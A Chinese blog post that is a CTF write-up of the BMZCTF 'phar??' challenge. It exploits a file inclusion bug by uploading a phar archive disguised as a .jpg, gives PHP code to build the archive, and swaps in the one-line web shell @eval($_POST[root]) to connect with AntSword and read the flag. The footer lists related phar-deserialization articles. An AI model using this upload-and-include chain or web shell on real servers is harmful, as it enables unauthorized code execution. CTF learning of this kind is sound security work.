[BMZCTF]-phar??

最新推荐文章于 2022-08-14 16:45:28 发布
最新推荐文章于 2022-08-14 16:45:28 发布
阅读量723 收藏 2
点赞数
分类专栏: BMZCTF php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/117219814
版权
php 同时被 2 个专栏收录
19 篇文章 1 订阅
订阅专栏
BMZCTF
13 篇文章 0 订阅
订阅专栏

[BMZCTF]-phar??
进入题目后,根据源代码中的提示,可以发现两个页面
在这里插入图片描述
在这里插入图片描述
在include.php中根据页面中的提示,应该是存在文件包含的,这里随便包含了一个文件试试,根据报错不难看出确实是存在文件包含漏洞,这里需要注意的一点是,他会在你包含的文件名后强制加上.php后缀
在这里插入图片描述
emem那根据常规套路,应该是在upload.php上传文件,然后在include.php包含该文件
在这里插入图片描述

尝试上传php文件无法上传,jpg文件可以
在这里插入图片描述
在这里插入图片描述
这里试了一下直接文件包含,不太行
在这里插入图片描述
果然,不出意外这道题应该是和题目提示的一样,需要用到phar反序列化来解决

<?php
    class Test {
    }

    @unlink("phar.phar");
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
    $o = new Test();
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.php", '<?php phpinfo();?>'); //添加要压缩的文件
    $phar->stopBuffering();
?>

将生成的phar.phar改成phar.jpg然后上传,然后进行文件包含
在这里插入图片描述
成功执行了phpinfo,接下来用蚁剑链接

把phpinfo删了后换成一句话木马@eval($_POST[root]),重新生成phar文件上传,用蚁剑连接
在这里插入图片描述
直接在虚拟终端里找flag
在这里插入图片描述
成功拿下

lmonstergg
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
phing-phar-builder:将Phing捆绑到具有依赖项PHP phar文件中,以供独立使用
05-11
在提供的文件名称列表"phing-phar-builder-master"中,我们可以推测这是一个项目源代码的主分支。通常,"master"分支代表了项目的主线开发,包含了最新的稳定代码。如果你需要使用或进一步了解PhingPharBuilder,你...
PHP Phar反序列化总结
Love&Share
10-18 4203
利用phar文件会以序列化的形式存储用户自定义的meta-data这一特性,拓展php反序列化漏洞的攻击面,这篇文章来总结下ctf遇到的phar的利用和绕过方式 Phar文件结构 phar文件是php里类似于JAR的一种打包文件本质上是一种压缩文件,在PHP 5.3 或更高版本中默认开启,一个phar文件一个分为四部分 1.a stub 可以理解为一个标志,格式为xxx<?php xxx; __HALT_COMPILER();?>,前面内容不限,但必须以__HALT_COMPILER()
phar反序列化+两道CTF例题
unexpectedthing的博客
02-14 6410
Phar反序列化 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。(漏洞利用点) 什么是phar文件 在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数,如(fopen(),copy(),file
记一道CTF中的phar反序列化
qq_53886354的博客
08-14 2347
通过config的值去控制文件读写, 审计一下正则发现基本上把伪协议都过滤了, 直接new getflag也不行,这种情况下十六进制类名也绕不了,再仔细审计一下发现虽然phar伪协议没有作限制。这一块实在是没什么思路去绕过, 于是参考了一下xenny和atao两位师傅的wp, 此处用的是xenny师傅的思路, 修改文件内容 -> 签名修复 -> 文件上传。, 大致原理就是用其他的压缩格式再对phar文件进行压缩达到混淆的效果, 部分压缩格式混淆过的phar内容同样可以直接被phar://伪协议解析。....
phar反序列化&&复现bytectf_2019_easycms
a3320315的博客
11-04 777
0x01 参考链接 为了表示尊重,先放出大部分内容的参考链接 链接 0x02 原理讲解 phar的本质是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是上述攻击手法最核心的地方 根据文件结构我们来自己构建一个phar文件,php内置了一个Phar类来处理相关操作 注意:要将php.ini中的phar.readonly...
[SWPUCTF 2018]SimplePHP phar漏洞及其文件上传
qq_54929891的博客
03-27 3236
在查看文件这个页面发现一个可疑参数file,试试能不能读取源代码 根据include包含来将各个文件源代码都提取出来,最重要的是class.php <?php class C1e4r { public $test; public $str; public function __destruct() { $this->test = $this->str; echo $this->test; } } ..
php-cs-fixer.phar
05-30
php-cs-fixer v2.16.3,来源 https://github.com/friendsofphp/php-cs-fixer
phar-sample:phar部署的例子
07-12
这个"phar-sample"是一个关于如何使用Phar进行部署的示例项目,通过分析其内容,我们可以深入理解Phar的使用方法和优势。 在PHP中,Phar(PHP Archive)是一种方便的工具,它可以将多个文件和目录封装到一个自包含...
php-pear go-pear.phar
04-16
php5以上版本中都没有go-pear.phar,需要自行下载到目录并运行,注意配置时目录要选择all,目录自行设置,默认目录有重复,会产生错误。
php序列化漏洞攻击实战,浅析phar反序列化漏洞攻击及实战
weixin_39801991的博客
03-24 91
@unlink( "phar.phar");$phar = newPhar( "phar.phar"); //后缀名必须为phar$phar->startBuffering;$phar->setStub( ""); //设置stub$o = newTestObject;$phar->setMetadata($o); //将自定义的meta-data存入manifest$phar-...
ctf赛题上传一个php木马,文件上传的ctf_web题目【伪协议】
weixin_34816913的博客
03-17 1061
1.第一题Qiyu_20170807_210121.png文件包含可以读到php源代码源代码:require("header.php");$page="";if (isset($_GET['page']))$page=$_GET['page'].".php"; #page参数自动添加了.php后缀,因此文件包含的index不需要加后缀else$page="main.php";include(...
CTF专题一2021网络WEB题目解析
kali_Ma的博客
10-19 6592
0x01 前言 背景: 2021年10月15日的“中国能源网络安全大赛” 感觉WEB的考点形形色色,其中有1道偏于黑盒测试的简单题目,4道是白盒审计类题目,还有一道是Python的反序列化题目,题目名称大致如下: 因为唯一的一道黑盒题目还是文件包含题目,所以将题目源代码全部扒下来了,给大家提供复现环境。(flag自己创建)。 为了感谢广大读者伙伴的支持,准备了以下福利给到大家: [一>获取<一] 1、200多本网络安全系列电子书(该有的都有了) 2、全套工具包(最全中文版,想用哪个用哪个)
BMZCTF-Web WriteUp
Crazy198410的博客
11-15 1352
Web 题 hctf_2018_warmup 打开后是一张图片。 查看源码发现source.php 访问,得到一串代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.
关于phar反序列化——BUUCTF-[CISCN2019 华北赛区 Day1 Web1]Dropbox
silence1_的博客
10-22 2679
关于phar反序列化——[CISCN2019 华北赛区 Day1 Web1]Dropbox 先看看phar是啥https://blog.csdn.net/u011474028/article/details/54973571 简单的说,phar就是php的压缩文件,它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,与file:// ,php://等类似,也是一种流包装器...
CTF 中的 PHP 漏洞利用总结
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
CTF中文件包含漏洞总结
热门推荐
Lethe's Blog
02-13 4万+
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
一个phar://的漏洞
Xi4or0uji
10-17 5794
前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。 这个鬼东西就是phar://的序列化的漏洞 介绍一下 phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stub stub 就是一个标志,格式xxx&lt;?php xxxxx; __HALT_COMPIL...
phar反序列化学习 [SWPUCTF 2018]SimplePHP
Je3Z的博客
08-02 338
用来入手phar反序列化感觉挺温和的一个题,来两个学习链接,phar的东西就不细说了,这里主讲这个题 先知社区——php反序列化拓展攻击详解–phar php反序列化 先测试一下吧,然后是一个文件上传功能,然后一个读文件,做了一些限制 然后把得到的文件名字都读一篇 flie.php <?php header("content-type:text/html;charset=utf-8"); include 'function.php'; include 'class.php'; ini_s
phar反序列化poc
最新发布
05-21
$phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值